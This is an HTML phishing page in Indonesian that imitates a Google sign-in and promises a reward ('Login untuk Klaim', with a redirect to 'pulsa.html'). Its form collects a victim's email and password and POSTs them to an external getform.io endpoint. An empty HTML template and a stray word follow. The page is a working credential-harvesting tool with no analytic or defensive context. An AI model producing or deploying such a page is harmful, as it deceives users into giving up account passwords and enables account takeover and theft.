<!DOCTYPE html>
<html lang="id">
<head>
  <meta charset="UTF-8">
  <title>Login untuk Klaim</title>
  <style>
    body {
      font-family: Arial;
      background: linear-gradient(to right, #f8cdda, #1d2b64);
      color: white;
      text-align: center;
      padding: 50px;
    }
    form {
      background: #fff;
      padding: 30px;
      border-radius: 15px;
      box-shadow: 0 0 20px rgba(0,0,0,0.3);
      color: black;
      display: inline-block;
    }
    input {
      margin: 10px;
      padding: 12px;
      width: 90%;
      border-radius: 10px;
      border: 1px solid #ccc;
    }
    button {
      padding: 12px 20px;
      font-size: 16px;
      background-color: #1d2b64;
      color: white;
      border: none;
      border-radius: 10px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <form action="https://getform.io/f/bjjonrxb" method="POST">
    <h2>Masuk Ke Akun Google Anda</h2>
    <input type="email" name="email" placeholder="Email" required><br>
    <input type="name" name="name" placeholder="Kata Sandi" required><br>
    <button type="submit" onclick="redirect()">Login</button>
  </form>

  <script>
    function redirect() {
      setTimeout(() => {
        window.location.href = "pulsa.html";
      }, 1000);
    }
  </script>
</body>
</html><!DOCTYPE html>
<html>

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title></title>
</head>

<body>
  
</body>

</html>￼Enter
